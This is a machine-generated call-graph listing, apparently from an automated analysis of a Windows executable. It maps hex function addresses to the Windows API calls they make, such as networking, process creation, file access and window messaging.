197820 87075->87079 87077 12caee 48 API calls 87076->87077 87086 1345e4 Mailbox 87077->87086 87285 134040 87078->87285 87448 17e713 401 API calls Mailbox 87079->87448 87082 134639 Mailbox 87082->86599 87083 19782c 87083->87082 87449 16d520 85 API calls 4 library calls 87083->87449 87085 134559 87085->87082 87085->87083 87085->87086 87087 181f19 129 API calls 87086->87087 87300 16dce9 87086->87300 87305 13f55e 87086->87305 87314 1795af WSAStartup 87086->87314 87316 179500 87086->87316 87325 171080 87086->87325 87328 16efcd 87086->87328 87362 18352a 87086->87362 87441 1250ec 87086->87441 87445 176fc3 87086->87445 87087->87082 87097->86627 87098->86632 87099->86636 87998 12a9a0 87100->87998 87102 1336e7 87103 19a269 87102->87103 87104 133778 87102->87104 87163 133aa8 87102->87163 88015 16d520 85 API calls 4 library calls 87103->88015 88010 13bc04 85 API calls 87104->88010 87108 19a68d 87108->87163 88036 16d520 85 API calls 4 library calls 87108->88036 87109 133793 87109->87108 87161 13396b Mailbox _memmove 87109->87161 87109->87163 88003 1210e8 87109->88003 87111 19a3e9 88026 16d520 85 API calls 4 library calls 87111->88026 87112 13bc5c 48 API calls 87112->87161 87116 19a583 87120 12fa40 401 API calls 87116->87120 87117 19a45c 88030 16d520 85 API calls 4 library calls 87117->88030 87118 19a289 87118->87111 88016 12d2d2 87118->88016 87122 19a5b5 87120->87122 87132 12d380 55 API calls 87122->87132 87122->87163 87125 13384e 87129 19a60c 87125->87129 87130 1338e5 87125->87130 87125->87161 87127 19a40f 88027 13cf79 49 API calls 87127->88027 87128 19a303 87140 19a317 87128->87140 87144 19a341 87128->87144 88035 16d231 50 API calls 87129->88035 87135 14010a 48 API calls 87130->87135 87136 19a5e6 87132->87136 87151 1338ec 87135->87151 88034 16d520 85 API calls 4 library calls 87136->88034 87137 12fa40 401 API calls 87137->87161 87139 19a42c 87141 19a44d 87139->87141 87142 19a441 87139->87142 88022 16d520 85 API calls 4 library calls 87140->88022 88029 16d520 85 API calls 4 library calls 87141->88029 88028 16d520 85 API calls 4 library calls 87142->88028 87148 19a366 87144->87148 87152 19a384 87144->87152 88023 17f211 401 API calls 87148->88023 87149 12d89e 50 API calls 87149->87161 87158 13399f 87151->87158 87153 19a37a 87152->87153 88024 17f4df 401 API calls 87152->88024 87153->87163 88025 13baef 48 API calls _memmove 87153->88025 87156 14010a 48 API calls 87156->87161 87159 12c935 48 API calls 87158->87159 87160 1339c0 87158->87160 87159->87160 87160->87163 87164 19a65e 87160->87164 87166 133a05 87160->87166 87161->87112 87161->87116 87161->87117 87161->87118 87161->87136 87161->87137 87161->87149 87161->87156 87161->87158 87161->87163 88011 12d500 53 API calls __cinit 87161->88011 88012 12d420 53 API calls 87161->88012 88013 13baef 48 API calls _memmove 87161->88013 88031 17d21a 81 API calls Mailbox 87161->88031 88032 1689e0 53 API calls 87161->88032 88033 12d772 55 API calls 87161->88033 87169 133ab5 Mailbox 87163->87169 88014 16d520 85 API calls 4 library calls 87163->88014 87165 12d89e 50 API calls 87164->87165 87165->87108 87166->87108 87166->87163 87167 133a95 87166->87167 87168 12d89e 50 API calls 87167->87168 87168->87163 87169->86599 87170->86599 87171->86609 87173 1284ba 87172->87173 87174 1284be 87172->87174 87173->86625 87175 195592 __i64tow 87174->87175 87176 1284d2 87174->87176 87177 195494 87174->87177 87184 1284ea __itow Mailbox _wcscpy 87174->87184 88040 14234b 79 API calls 3 library calls 87176->88040 87178 19557a 87177->87178 87179 19549d 87177->87179 88041 14234b 79 API calls 3 library calls 87178->88041 87179->87184 87185 1954bc 87179->87185 87181 14010a 48 API calls 87183 1284f4 87181->87183 87183->87173 87186 12caee 48 API calls 87183->87186 87184->87181 87187 14010a 48 API calls 87185->87187 87186->87173 87188 1954d9 87187->87188 87189 14010a 48 API calls 87188->87189 87190 1954ff 87189->87190 87190->87173 87191 12caee 48 API calls 87190->87191 87191->87173 87192->86616 87194 17cd21 87193->87194 87198 17cd46 87193->87198 87195 12ca8e 48 API calls 87194->87195 87196 17cd2d 87195->87196 87215 17c8b7 87196->87215 87198->87039 87199->87038 87200->87045 87202 12cad0 87201->87202 87203 12ca9a 87201->87203 87204 12cae3 87202->87204 87205 12cad9 87202->87205 87209 14010a 48 API calls 87203->87209 87279 12c4cd 87204->87279 87206 127e53 48 API calls 87205->87206 87208 12cac6 87206->87208 87208->87045 87210 12caad 87209->87210 87211 194f11 87210->87211 87212 12cab8 87210->87212 87211->87208 87214 12d3d2 48 API calls 87211->87214 87212->87208 87213 12caee 48 API calls 87212->87213 87213->87208 87214->87208 87217 17c914 87215->87217 87218 17c8f7 87215->87218 87273 17c235 401 API calls Mailbox 87217->87273 87218->87217 87219 17c934 87218->87219 87220 17cc61 87218->87220 87219->87217 87251 15abf3 87219->87251 87221 17cc6e 87220->87221 87222 17cca9 87220->87222 87269 13d6b4 48 API calls 87221->87269 87222->87217 87227 17ccb6 87222->87227 87224 17c964 87224->87217 87225 17c973 87224->87225 87237 17c9a1 87225->87237 87255 15a8c8 87225->87255 87271 13d6b4 48 API calls 87227->87271 87228 17cc87 87270 1697b6 88 API calls 87228->87270 87232 17ccd6 87272 16503c 90 API calls Mailbox 87232->87272 87234 17cadc VariantInit 87243 17cb11 _memset 87234->87243 87238 17ca4a 87237->87238 87265 15a25b 105 API calls 87237->87265 87238->87234 87239 17ca86 VariantClear 87238->87239 87239->87238 87240 17caa5 SysAllocString 87239->87240 87240->87238 87241 17cbb4 87267 16a6f6 102 API calls 87241->87267 87242 17cb8e 87266 17c235 401 API calls Mailbox 87242->87266 87243->87241 87243->87242 87245 17cbad 87247 17cc41 VariantClear 87245->87247 87248 17cc52 87247->87248 87248->87198 87249 17cbce 87249->87247 87268 16a6f6 102 API calls 87249->87268 87252 15ac16 87251->87252 87253 15ac04 __wsetenvp 87251->87253 87252->87224 87253->87252 87274 123bcf 87253->87274 87256 15a8f2 87255->87256 87257 15a9ed SysFreeString 87256->87257 87258 15aa7e 87256->87258 87259 15a90a 87256->87259 87260 15a9f9 87256->87260 87257->87260 87258->87259 87258->87260 87261 15aad9 SysFreeString 87258->87261 87262 15aac9 lstrcmpiW 87258->87262 87259->87237 87260->87259 87278 15a78a RaiseException 87260->87278 87261->87258 87262->87261 87264 15aafa SysFreeString 87262->87264 87264->87260 87265->87237 87266->87245 87267->87249 87268->87249 87269->87228 87270->87248 87271->87232 87272->87248 87273->87248 87275 123bd9 __wsetenvp 87274->87275 87276 14010a 48 API calls 87275->87276 87277 123bee _wcscpy 87276->87277 87277->87252 87278->87260 87280 12c4e7 87279->87280 87281 12c4da 87279->87281 87282 14010a 48 API calls 87280->87282 87281->87208 87282->87281 87283->87060 87284->87055 87286 19787b 87285->87286 87289 13406c 87285->87289 87451 16d520 85 API calls 4 library calls 87286->87451 87288 19788c 87452 16d520 85 API calls 4 library calls 87288->87452 87289->87288 87296 1340a6 _memmove 87289->87296 87291 134175 87297 134185 87291->87297 87450 17d21a 81 API calls Mailbox 87291->87450 87293 14010a 48 API calls 87293->87296 87294 1341f1 87294->87085 87295 12fa40 401 API calls 87295->87296 87296->87291 87296->87293 87296->87295 87296->87297 87298 1978d8 87296->87298 87297->87085 87453 16d520 85 API calls 4 library calls 87298->87453 87301 1284a6 80 API calls 87300->87301 87302 16dcfc 87301->87302 87454 166d6d 87302->87454 87304 16dd06 87304->87082 87466 12cdb4 87305->87466 87307 13f572 87308 1975d1 Sleep 87307->87308 87309 13f57a timeGetTime 87307->87309 87310 12cdb4 48 API calls 87309->87310 87311 13f590 87310->87311 87471 12e1f0 87311->87471 87315 1795e0 87314->87315 87315->87082 87317 12cdb4 48 API calls 87316->87317 87318 179515 87317->87318 87319 16be47 50 API calls 87318->87319 87320 179522 87319->87320 87321 17952f send 87320->87321 87322 179546 87321->87322 87323 179552 WSAGetLastError 87322->87323 87324 17956a 87322->87324 87323->87324 87324->87082 87737 1722e5 87325->87737 87327 171090 87327->87082 87329 1284a6 80 API calls 87328->87329 87330 16eff2 87329->87330 87921 1678ad GetFullPathNameW 87330->87921 87335 16f04b CoInitialize CoCreateInstance 87337 16f070 87335->87337 87338 16f08e 87335->87338 87340 16f07a CoUninitialize 87337->87340 87339 1284a6 80 API calls 87338->87339 87341 16f09d 87339->87341 87360 16f23c Mailbox 87340->87360 87360->87082 87363 12d3d2 48 API calls 87362->87363 87364 18354a 87363->87364 87365 12d3d2 48 API calls 87364->87365 87366 183553 87365->87366 87367 12d3d2 48 API calls 87366->87367 87368 18355c 87367->87368 87369 1284a6 80 API calls 87368->87369 87380 1835e9 Mailbox 87368->87380 87370 183580 87369->87370 87941 183d7b 87370->87941 87380->87082 87442 1250f6 87441->87442 87443 125105 87441->87443 87442->87082 87443->87442 87444 12510a CloseHandle 87443->87444 87444->87442 87446 1284a6 80 API calls 87445->87446 87447 176fd6 SetWindowTextW 87446->87447 87447->87082 87448->87083 87449->87082 87450->87294 87451->87288 87452->87297 87453->87297 87455 166d8a __wsetenvp 87454->87455 87456 166db3 GetFileAttributesW 87455->87456 87457 166dc5 GetLastError 87456->87457 87458 166de3 87456->87458 87459 166de7 87457->87459 87460 166dd0 CreateDirectoryW 87457->87460 87458->87304 87459->87458 87461 123bcf 48 API calls 87459->87461 87460->87458 87460->87459 87462 166df7 _wcsrchr 87461->87462 87462->87458 87463 166d6d 48 API calls 87462->87463 87464 166e1b 87463->87464 87464->87458 87465 166e28 CreateDirectoryW 87464->87465 87465->87458 87467 12cdc5 87466->87467 87468 12cdca 87466->87468 87467->87468 87533 142241 48 API calls 87467->87533 87468->87307 87470 12ce07 87470->87307 87472 12e216 87471->87472 87507 12e226 Mailbox 87471->87507 87474 12e670 87472->87474 87472->87507 87473 16d520 85 API calls 87473->87507 87602 13ecee 401 API calls 87474->87602 87476 12e4fd 87476->87082 87478 12e681 87478->87476 87480 12e68e 87478->87480 87479 12e26c PeekMessageW 87479->87507 87604 13ec33 401 API calls Mailbox 87480->87604 87482 195b13 Sleep 87482->87507 87483 12e695 LockWindowUpdate DestroyWindow GetMessageW 87483->87476 87486 12e6c7 87483->87486 87484 12e4e7 87484->87476 87603 12322e 16 API calls 87484->87603 87489 13cf79 49 API calls 87489->87507 87491 12e657 PeekMessageW 87491->87507 87492 14010a 48 API calls 87492->87507 87493 12e517 timeGetTime 87493->87507 87495 12c935 48 API calls 87495->87507 87496 195dfc WaitForSingleObject 87499 195e19 GetExitCodeProcess CloseHandle 87496->87499 87496->87507 87497 12e641 TranslateMessage DispatchMessageW 87497->87491 87498 196147 Sleep 87520 195cce Mailbox 87498->87520 87499->87507 87500 12d3d2 48 API calls 87500->87520 87501 12e6cc timeGetTime 87605 13cf79 49 API calls 87501->87605 87502 195feb Sleep 87502->87507 87507->87473 87507->87479 87507->87482 87507->87484 87507->87489 87507->87491 87507->87492 87507->87493 87507->87495 87507->87496 87507->87497 87507->87498 87507->87501 87507->87502 87511 121000 377 API calls 87507->87511 87512 195cea Sleep 87507->87512 87517 121dce 106 API calls 87507->87517 87507->87520 87525 12fa40 377 API calls 87507->87525 87528 1344e0 377 API calls 87507->87528 87529 133680 377 API calls 87507->87529 87531 12caee 48 API calls 87507->87531 87532 12d380 55 API calls 87507->87532 87534 12e7e0 87507->87534 87541 12ea00 87507->87541 87591 13f381 87507->87591 87596 13ed1a 87507->87596 87601 12e7b0 401 API calls Mailbox 87507->87601 87606 188b20 48 API calls 87507->87606 87614 13e3a5 timeGetTime 87507->87614 87509 1961de GetExitCodeProcess 87513 19620a CloseHandle 87509->87513 87514 1961f4 WaitForSingleObject 87509->87514 87511->87507 87512->87507 87513->87520 87514->87507 87514->87513 87515 195cd7 Sleep 87515->87512 87516 188a48 107 API calls 87516->87520 87517->87507 87519 196266 Sleep 87519->87507 87520->87500 87520->87507 87520->87509 87520->87512 87520->87515 87520->87516 87520->87519 87523 12caee 48 API calls 87520->87523 87607 1656dc 49 API calls Mailbox 87520->87607 87608 13cf79 49 API calls 87520->87608 87609 12d380 87520->87609 87613 121000 401 API calls 87520->87613 87615 17d12a 50 API calls 87520->87615 87616 168355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 87520->87616 87617 13e3a5 timeGetTime 87520->87617 87618 166f5b CreateToolhelp32Snapshot Process32FirstW 87520->87618 87523->87520 87525->87507 87528->87507 87529->87507 87531->87507 87532->87507 87533->87470 87535 12e80f 87534->87535 87536 12e7fd 87534->87536 87656 16d520 85 API calls 4 library calls 87535->87656 87625 12dcd0 87536->87625 87538 12e806 87538->87507 87540 1998e8 87540->87540 87542 12ea20 87541->87542 87543 12fa40 401 API calls 87542->87543 87546 12ea89 87542->87546 87545 199919 87543->87545 87544 1999bc 87671 16d520 85 API calls 4 library calls 87544->87671 87545->87546 87668 16d520 85 API calls 4 library calls 87545->87668 87551 12d3d2 48 API calls 87546->87551 87572 12eb18 87546->87572 87574 12ecd7 Mailbox 87546->87574 87549 12d3d2 48 API calls 87550 199997 87549->87550 87670 141b2a 52 API calls __cinit 87550->87670 87552 199963 87551->87552 87669 141b2a 52 API calls __cinit 87552->87669 87555 12d380 55 API calls 87555->87574 87557 199d70 87680 17e2fb 401 API calls Mailbox 87557->87680 87558 199e49 87685 16d520 85 API calls 4 library calls 87558->87685 87559 16d520 85 API calls 87559->87574 87560 199dc2 87682 16d520 85 API calls 4 library calls 87560->87682 87561 199ddf 87683 17c235 401 API calls Mailbox 87561->87683 87563 12fa40 401 API calls 87563->87574 87567 12342c 48 API calls 87567->87574 87570 199df7 87590 12ef0c Mailbox 87570->87590 87684 16d520 85 API calls 4 library calls 87570->87684 87571 1314a0 48 API calls 87571->87574 87572->87549 87572->87574 87574->87544 87574->87555 87574->87557 87574->87558 87574->87559 87574->87560 87574->87561 87574->87563 87574->87567 87574->87571 87575 12f56f 87574->87575 87578 199a3c 87574->87578 87574->87590 87664 12d805 87574->87664 87672 16a3ee 48 API calls 87574->87672 87673 17ede9 401 API calls 87574->87673 87678 15a599 InterlockedDecrement 87574->87678 87679 17f4df 401 API calls 87574->87679 87575->87590 87681 16d520 85 API calls 4 library calls 87575->87681 87674 17d154 48 API calls 87578->87674 87580 199a48 87582 199a56 87580->87582 87583 199a9b 87580->87583 87590->87507 87592 13f390 87591->87592 87593 19ee11 87591->87593 87592->87507 87594 19ee46 87593->87594 87595 19ee28 TranslateAcceleratorW 87593->87595 87595->87592 87597 13ed2c 87596->87597 87600 13ed34 87596->87600 87597->87507 87598 13ed5e IsDialogMessageW 87598->87597 87598->87600 87599 19ebec GetClassLongW 87599->87598 87599->87600 87600->87597 87600->87598 87600->87599 87601->87507 87602->87484 87603->87478 87604->87483 87605->87507 87606->87507 87607->87520 87608->87520 87610 12d38b 87609->87610 87611 12d3b4 87610->87611 87686 12d772 55 API calls 87610->87686 87611->87520 87613->87520 87614->87507 87615->87520 87616->87520 87617->87520 87687 1679c2 87618->87687 87620 166fa4 Process32NextW 87621 167021 CloseHandle 87620->87621 87623 166fa0 _wcscat 87620->87623 87621->87520 87623->87620 87623->87621 87693 14297d 87623->87693 87696 141bc7 87623->87696 87626 12fa40 401 API calls 87625->87626 87638 12dd0f _memmove 87626->87638 87627 198dbe 87663 16d520 85 API calls 4 library calls 87627->87663 87629 198ddc 87629->87629 87630 12dd70 87630->87538 87631 12e12b Mailbox 87635 14010a 48 API calls 87631->87635 87632 12e051 87633 12e066 87632->87633 87634 198daf 87632->87634 87646 12decb _memmove 87635->87646 87638->87627 87638->87630 87638->87631 87639 14010a 48 API calls 87638->87639 87640 12deb7 87638->87640 87649 12df29 87638->87649 87639->87638 87640->87631 87642 12dec4 87640->87642 87645 14010a 48 API calls 87642->87645 87644 198d9e 87661 16d520 85 API calls 4 library calls 87644->87661 87645->87646 87646->87649 87649->87632 87649->87644 87651 12df64 87649->87651 87652 198d76 87649->87652 87654 198d51 87649->87654 87658 125322 401 API calls 87649->87658 87651->87538 87660 16d520 85 API calls 4 library calls 87652->87660 87659 16d520 85 API calls 4 library calls 87654->87659 87656->87540 87658->87649 87659->87651 87660->87651 87661->87651 87663->87629 87665 12d828 _memmove 87664->87665 87666 12d815 87664->87666 87665->87574 87666->87665 87667 14010a 48 API calls 87666->87667 87667->87665 87668->87546 87669->87572 87670->87574 87671->87590 87672->87574 87673->87574 87674->87580 87678->87574 87679->87574 87680->87575 87681->87590 87682->87590 87683->87570 87684->87590 87685->87590 87686->87611 87688 1679e9 87687->87688 87692 1679d0 87687->87692 87707 14224a 58 API calls __wcstoi64 87688->87707 87691 1679ef 87691->87623 87692->87688 87692->87691 87706 1422df GetStringTypeW wcstoxq 87692->87706 87708 1429c7 87693->87708 87697 141bd3 87696->87697 87698 141c48 87696->87698 87706->87692 87707->87691 87738 172306 87737->87738 87739 172365 87738->87739 87740 17230a 87738->87740 87806 13f0f3 48 API calls 87739->87806 87741 14010a 48 API calls 87740->87741 87743 172311 87741->87743 87744 17231f 87743->87744 87793 125080 49 API calls 87743->87793 87746 1284a6 80 API calls 87744->87746 87748 172331 87746->87748 87747 172379 87749 17234d 87747->87749 87751 17243f 87747->87751 87753 1723bb 87747->87753 87794 124bf9 87748->87794 87749->87327 87754 16be47 50 API calls 87751->87754 87756 1284a6 80 API calls 87753->87756 87757 172446 87754->87757 87764 1723c2 87756->87764 87809 16689f SetFilePointerEx SetFilePointerEx WriteFile 87757->87809 87759 1723f6 87775 1667dc 87759->87775 87761 172400 87807 127b6e 48 API calls 87761->87807 87764->87759 87764->87761 87765 172410 87766 12c935 48 API calls 87765->87766 87767 17241a 87766->87767 87808 1239e8 48 API calls 2 library calls 87767->87808 87769 1723fe Mailbox 87769->87749 87771 1250ec CloseHandle 87769->87771 87770 172428 87772 1667dc 55 API calls 87770->87772 87773 172490 87771->87773 87772->87769 87810 124592 CloseHandle 87773->87810 87776 1667f6 87775->87776 87777 1667ec 87775->87777 87779 1667fc 87776->87779 87780 166808 87776->87780 87827 166917 SetFilePointerEx SetFilePointerEx WriteFile 87777->87827 87828 1668b9 51 API calls 87779->87828 87782 166824 87780->87782 87783 166811 87780->87783 87811 12a6d4 87782->87811 87785 12a6d4 48 API calls 87783->87785 87788 166816 87785->87788 87787 1667f4 Mailbox 87787->87769 87829 1666f8 50 API calls 87788->87829 87793->87744 87795 1250ec CloseHandle 87794->87795 87796 124c04 87795->87796 87867 124b88 87796->87867 87799 124c44 87799->87747 87806->87747 87807->87765 87808->87770 87809->87769 87810->87749 87812 14010a 48 API calls 87811->87812 87813 12a6e7 87812->87813 87827->87787 87828->87787 87868 124ba1 CreateFileW 87867->87868 87869 194957 87867->87869 87872 124bc3 87868->87872 87870 19495d CreateFileW 87869->87870 87869->87872 87871 194983 87870->87871 87870->87872 87872->87799 87874 124df0 87872->87874 87876 124e10 87874->87876 87922 127e53 48 API calls 87921->87922 87923 1678df 87922->87923 87935 13e617 87923->87935 87926 17267a 87927 1726a4 __wsetenvp 87926->87927 87928 172763 87927->87928 87929 1726d8 87927->87929 87932 16f039 87927->87932 87928->87932 87940 13dfd2 60 API calls 87928->87940 87929->87932 87939 13dfd2 60 API calls 87929->87939 87932->87335 87933 1239e8 48 API calls 2 library calls 87932->87933 87933->87335 87936 13e625 87935->87936 87937 12a2fb 48 API calls 87936->87937 87938 13e635 87937->87938 87938->87926 87939->87929 87940->87928 87942 12c4cd 48 API calls 87941->87942 87943 183d89 87942->87943 87944 12c4cd 48 API calls 87943->87944 87945 183d91 87944->87945 87946 12c4cd 48 API calls 87945->87946 87947 183d99 87946->87947 87948 183e01 87947->87948 87988 12a4f6 87947->87988 87999 12a9af 87998->87999 88002 12a9ca 87998->88002 88000 12b8a7 48 API calls 87999->88000 88001 12a9b7 CharUpperBuffW 88000->88001 88001->88002 88002->87102 88004 194c5a 88003->88004 88005 1210f9 88003->88005 88006 14010a 48 API calls 88005->88006 88008 121100 88006->88008 88007 121121 88007->87125 88008->88007 88037 12113c 48 API calls 88008->88037 88010->87109 88011->87161 88012->87161 88013->87161 88014->87169 88015->87109 88017 12d30a 88016->88017 88018 12d2df 88016->88018 88017->87127 88017->87128 88021 12d2e6 88018->88021 88039 12d349 53 API calls 88018->88039 88021->88017 88038 12d349 53 API calls 88021->88038 88022->87163 88023->87153 88024->87153 88025->87111 88026->87163 88027->87139 88028->87163 88029->87163 88030->87163 88031->87161 88032->87161 88033->87161 88034->87163 88035->87158 88036->87163 88037->88007 88038->88017 88039->88021 88040->87184 88041->87184 88042->86675 88043->86675 88044->86675 88045->86675 88046->86675 88047->86671 88048->86667 88049->86642 88050->86646 88051->86653 88052->86661 88054 1284a6 80 API calls 88053->88054 88055 17f7db 88054->88055 88056 17f81d Mailbox 88055->88056 88089 180458 88055->88089 88056->86696 88058 17fa7c 88059 17fbeb 88058->88059 88063 17fa86 88058->88063 88135 180579 88 API calls Mailbox 88059->88135 88062 17fbf8 88062->88063 88064 17fc04 88062->88064 88102 17f5fb 88063->88102 88064->88056 88065 1284a6 80 API calls 88082 17f875 Mailbox 88065->88082 88070 17faba 88116 13f92c 88070->88116 88073 17fad4 88122 16d520 85 API calls 4 library calls 88073->88122 88074 17faee 88123 123320 88074->88123 88077 17fadf GetCurrentProcess TerminateProcess 88077->88074 88078 17fb05 88079 1314a0 48 API calls 88078->88079 88088 17fb2f 88078->88088 88081 17fb1e 88079->88081 88080 17fc56 88080->88056 88085 17fc6f FreeLibrary 88080->88085 88134 180300 104 API calls _free 88081->88134 88082->88056 88082->88058 88082->88065 88082->88082 88120 1828d9 48 API calls _memmove 88082->88120 88121 17fc96 60 API calls 2 library calls 88082->88121 88084 1314a0 48 API calls 88084->88088 88085->88056 88087 12d89e 50 API calls 88087->88088 88088->88080 88088->88084 88088->88087 88136 180300 104 API calls _free 88088->88136 88090 12b8a7 48 API calls 88089->88090 88091 180473 CharLowerBuffW 88090->88091 88092 17267a 60 API calls 88091->88092 88093 180494 88092->88093 88095 12d3d2 48 API calls 88093->88095 88101 1804cf Mailbox 88093->88101 88096 1804ac 88095->88096 88097 127f40 48 API calls 88096->88097 88098 1804c3 88097->88098 88100 12a2fb 48 API calls 88098->88100 88099 18050b Mailbox 88099->88082 88100->88101 88101->88099 88137 17fc96 60 API calls 2 library calls 88101->88137 88103 17f616 88102->88103 88104 17f66b 88102->88104 88105 14010a 48 API calls 88103->88105 88108 180719 88104->88108 88107 17f638 88105->88107 88106 14010a 48 API calls 88106->88107 88107->88104 88107->88106 88109 180944 Mailbox 88108->88109 88115 18073c _strcat _wcscpy __wsetenvp 88108->88115 88109->88070 88110 12d00b 58 API calls 88110->88115 88111 12cdb4 48 API calls 88111->88115 88112 1284a6 80 API calls 88112->88115 88113 1445ec 47 API calls __crtGetStringTypeA_stat 88113->88115 88115->88109 88115->88110 88115->88111 88115->88112 88115->88113 88138 168932 50 API calls __wsetenvp 88115->88138 88117 13f941 88116->88117 88118 13f9d9 select 88117->88118 88119 13f9a7 88117->88119 88118->88119 88119->88073 88119->88074 88120->88082 88121->88082 88122->88077 88124 123334 88123->88124 88125 123339 Mailbox 88123->88125 88139 12342c 48 API calls 88124->88139 88132 123347 88125->88132 88140 12346e 48 API calls 88125->88140 88128 14010a 48 API calls 88130 1233d8 88128->88130 88129 123422 88129->88078 88131 14010a 48 API calls 88130->88131 88133 1233e3 88131->88133 88132->88128 88132->88129 88133->88078 88134->88088 88135->88062 88136->88088 88137->88099 88138->88115 88139->88125 88140->88132 88142 176b25 GetWindowRect 88141->88142 88143 176b42 88141->88143 88144 176b5c 88142->88144 88143->88144 88145 176b52 ClientToScreen 88143->88145 88144->86705 88144->86708 88145->88144 88146->86711 88147->86715 88156 17ae3b 88148->88156 88151 17ad05 Mailbox 88152 17ad31 htons 88151->88152 88153 17ad1b 88151->88153 88152->88153 88153->86722 88155 16d7f2 88154->88155 88155->86729 88157 12a6d4 48 API calls 88156->88157 88158 17ae49 88157->88158 88161 17ae79 WideCharToMultiByte 88158->88161 88160 17acf3 inet_addr 88160->88151 88162 17aea7 88161->88162 88163 17ae9d 88161->88163 88165 14010a 48 API calls 88162->88165 88164 13f324 48 API calls 88163->88164 88168 17aea5 88164->88168 88166 17aeae WideCharToMultiByte 88165->88166 88167 13f2d0 48 API calls 88166->88167 88167->88168 88168->88160 88169->86738 88171 121990 88170->88171 88175 1219af _memmove 88170->88175 88173 14010a 48 API calls 88171->88173 88172 14010a 48 API calls 88174 1219c6 88172->88174 88173->88175 88174->86767 88175->88172 88176->86750 88177->86758 88178->86759 88180 1823eb _memset 88179->88180 88181 182428 88180->88181 88182 182452 88180->88182 88183 12cdb4 48 API calls 88181->88183 88186 12cdb4 48 API calls 88182->88186 88187 182476 88182->88187 88184 182433 88183->88184 88184->88187 88190 12cdb4 48 API calls 88184->88190 88185 1824b0 88189 1284a6 80 API calls 88185->88189 88188 182448 88186->88188 88187->88185 88191 12cdb4 48 API calls 88187->88191 88193 12cdb4 48 API calls 88188->88193 88192 1824d4 88189->88192 88190->88188 88191->88185 88194 123bcf 48 API calls 88192->88194 88193->88187 88195 1824de 88194->88195 88196 1824e8 88195->88196 88197 1825a1 88195->88197 88198 1284a6 80 API calls 88196->88198 88199 1825d3 GetCurrentDirectoryW 88197->88199 88202 1284a6 80 API calls 88197->88202 88200 1824f9 88198->88200 88201 14010a 48 API calls 88199->88201 88203 123bcf 48 API calls 88200->88203 88204 1825f8 GetCurrentDirectoryW 88201->88204 88205 1825b8 88202->88205 88207 182503 88203->88207 88208 182605 88204->88208 88206 123bcf 48 API calls 88205->88206 88209 1825c2 __wsetenvp 88206->88209 88210 1284a6 80 API calls 88207->88210 88213 12ca8e 48 API calls 88208->88213 88217 18263e 88208->88217 88209->88199 88209->88217 88211 182514 88210->88211 88212 123bcf 48 API calls 88211->88212 88214 18251e 88212->88214 88215 18261e 88213->88215 88218 1284a6 80 API calls 88214->88218 88219 12ca8e 48 API calls 88215->88219 88216 18268a 88224 18274c CreateProcessW 88216->88224 88225 1826c1 88216->88225 88217->88216 88257 16a17a 7 API calls 88217->88257 88221 18252f 88218->88221 88222 18262e 88219->88222 88226 123bcf 48 API calls 88221->88226 88227 12ca8e 48 API calls 88222->88227 88223 182655 88258 16a073 7 API calls 88223->88258 88237 18276b 88224->88237 88260 15bc90 69 API calls 88225->88260 88228 182539 88226->88228 88227->88217 88231 18256f GetSystemDirectoryW 88228->88231 88233 1284a6 80 API calls 88228->88233 88235 14010a 48 API calls 88231->88235 88232 182670 88259 16a102 7 API calls 88232->88259 88236 182550 88233->88236 88238 182594 GetSystemDirectoryW 88235->88238 88239 123bcf 48 API calls 88236->88239 88241 1827bd CloseHandle 88237->88241 88242 182780 88237->88242 88238->88208 88240 18255a __wsetenvp 88239->88240 88240->88208 88240->88231 88243 1827cb 88241->88243 88250 1827f5 88241->88250 88246 182791 GetLastError 88242->88246 88261 169d09 CloseHandle Mailbox 88243->88261 88245 1827fb 88248 1827a5 88245->88248 88246->88248 88262 169b29 CloseHandle 88248->88262 88250->88245 88253 182827 CloseHandle 88250->88253 88253->88248 88254 181f2b 88254->86547 88256 1826df __wsetenvp 88256->88237 88257->88223 88258->88232 88259->88216 88260->88256 88262->88254 88264 12d89e 50 API calls 88263->88264 88265 121a08 88264->88265 88266 121a12 88265->88266 88267 19db7d 88265->88267 88268 1284a6 80 API calls 88266->88268 88269 127e53 48 API calls 88267->88269 88270 121a1f 88268->88270 88271 19db8d 88269->88271 88272 12c935 48 API calls 88270->88272 88271->88271 88273 121a2d 88272->88273 88274 121dce 88273->88274 88275 121de4 Mailbox 88274->88275 88276 19db26 88275->88276 88280 121dfd 88275->88280 88277 19db2b IsWindow 88276->88277 88278 121e51 88277->88278 88279 19db3f 88277->88279 88278->86775 88342 12200a 88279->88342 88281 121e46 88280->88281 88283 1284a6 80 API calls 88280->88283 88281->88278 88285 19db65 IsWindow 88281->88285 88286 121e17 88283->88286 88285->88278 88285->88279 88289 121f04 88286->88289 88287 12197e 48 API calls 88287->88278 88290 121f1a Mailbox 88289->88290 88291 12c935 48 API calls 88290->88291 88292 121f3e 88291->88292 88293 12c935 48 API calls 88292->88293 88294 121f49 88293->88294 88295 127e53 48 API calls 88294->88295 88296 121f59 88295->88296 88297 12d3d2 48 API calls 88296->88297 88298 121f87 88297->88298 88299 12d3d2 48 API calls 88298->88299 88300 121f90 88299->88300 88301 12d3d2 48 API calls 88300->88301 88302 121f99 88301->88302 88303 192569 88302->88303 88304 121fac 88302->88304 88346 15e4ea 60 API calls 3 library calls 88303->88346 88306 192583 88304->88306 88308 121fbe GetForegroundWindow 88304->88308 88307 12a4f6 48 API calls 88306->88307 88309 12200a 48 API calls 88308->88309 88343 122016 88342->88343 88344 14010a 48 API calls 88343->88344 88345 122023 88344->88345 88345->88287 88346->88306 88381->86808 88383 13dd89 88382->88383 88384 194a7d FindFirstFileW 88382->88384 88383->86547 88385 194a8e 88384->88385 88386 194a95 FindClose 88384->88386 88385->88386 88387->86833 88389 12c4cd 48 API calls 88388->88389 88390 15e2fe 88389->88390 88411 12193b SendMessageTimeoutW 88390->88411 88392 15e305 88404 15e309 Mailbox 88392->88404 88412 15e390 88392->88412 88394 15e314 88395 14010a 48 API calls 88394->88395 88396 15e338 SendMessageW 88395->88396 88397 15e34e _strlen 88396->88397 88396->88404 88398 15e378 88397->88398 88399 15e35a 88397->88399 88400 127e53 48 API calls 88398->88400 88417 15e0f5 48 API calls 2 library calls 88399->88417 88400->88404 88402 15e362 88418 12c610 MultiByteToWideChar 88402->88418 88404->86845 88406 127c3a 88405->88406 88407 127bfb 88405->88407 88408 12c935 48 API calls 88406->88408 88410 14010a 48 API calls 88407->88410 88409 127c0e 88408->88409 88409->86847 88410->88409 88411->88392 88437 12193b SendMessageTimeoutW 88412->88437 88414 15e39a 88415 15e3a2 SendMessageW 88414->88415 88416 15e39e 